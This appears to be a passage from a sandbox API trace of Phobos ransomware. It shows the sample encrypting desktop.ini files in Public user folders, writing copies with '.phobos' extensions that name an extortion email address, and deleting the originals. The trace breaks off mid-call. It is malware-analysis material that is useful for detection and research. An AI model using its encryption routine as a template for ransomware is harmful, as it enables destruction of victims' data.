[0203.565] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.565] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\desktop\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.565] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.565] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.565] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xae, lpOverlapped=0x0) returned 1 [0203.566] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0203.566] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0203.567] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.567] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.567] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.567] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.567] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.567] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.567] CloseHandle (hObject=0x160) returned 1 [0203.567] CloseHandle (hObject=0xfc) returned 1 [0203.567] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini")) returned 1 [0203.568] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.569] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=174) returned 1 [0203.569] CloseHandle (hObject=0xfc) returned 1 [0203.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini")) returned 0x26 [0203.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.569] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.569] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.569] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.569] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.569] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xae, lpOverlapped=0x0) returned 1 [0203.570] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0203.570] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0203.571] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.571] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.571] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.571] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.571] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.571] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.571] CloseHandle (hObject=0xfc) returned 1 [0203.571] CloseHandle (hObject=0x160) returned 1 [0203.571] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini")) returned 1 [0203.572] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.572] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=278) returned 1 [0203.572] CloseHandle (hObject=0x160) returned 1 [0203.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 0x26 [0203.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\documents\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.573] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.573] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\documents\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.573] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.573] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.573] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x116, lpOverlapped=0x0) returned 1 [0203.574] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0203.574] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0203.575] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.575] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.575] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.575] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.575] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.575] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.575] CloseHandle (hObject=0x160) returned 1 [0203.575] CloseHandle (hObject=0xfc) returned 1 [0203.575] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 1 [0203.576] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.577] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=174) returned 1 [0203.577] CloseHandle (hObject=0xfc) returned 1 [0203.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini")) returned 0x26 [0203.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\downloads\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.577] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.577] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\downloads\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.578] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.578] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.578] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xae, lpOverlapped=0x0) returned 1 [0203.578] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0203.578] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0203.579] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.579] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.579] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.579] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.579] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.579] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.579] CloseHandle (hObject=0xfc) returned 1 [0203.579] CloseHandle (hObject=0x160) returned 1 [0203.579] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini")) returned 1 [0203.580] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.581] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=88) returned 1 [0203.581] CloseHandle (hObject=0x160) returned 1 [0203.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini")) returned 0x26 [0203.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\libraries\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.581] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.581] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\libraries\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.607] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.607] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.607] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x58, lpOverlapped=0x0) returned 1 [0203.608] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0203.608] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x60, lpOverlapped=0x0) returned 1 [0203.608] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.609] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.609] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.609] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.609] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.609] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.609] CloseHandle (hObject=0x160) returned 1 [0203.609] CloseHandle (hObject=0xfc) returned 1 [0203.609] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini")) returned 1 [0203.610] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.610] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=380) returned 1 [0203.610] CloseHandle (hObject=0xfc) returned 1 [0203.610] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini")) returned 0x26 [0203.610] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\music\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.610] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.610] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\music\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.611] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.611] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.611] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x17c, lpOverlapped=0x0) returned 1 [0203.612] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x180, dwBufLen=0x180 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x180) returned 1 [0203.612] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x180, lpOverlapped=0x0) returned 1 [0203.612] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.612] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.612] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.612] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.612] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.613] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.613] CloseHandle (hObject=0xfc) returned 1 [0203.613] CloseHandle (hObject=0x160) returned 1 [0203.613] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini")) returned 1 [0203.614] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.624] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=586) returned 1 [0203.624] CloseHandle (hObject=0x160) returned 1 [0203.624] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini")) returned 0x26 [0203.624] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.624] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.624] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\music\\sample 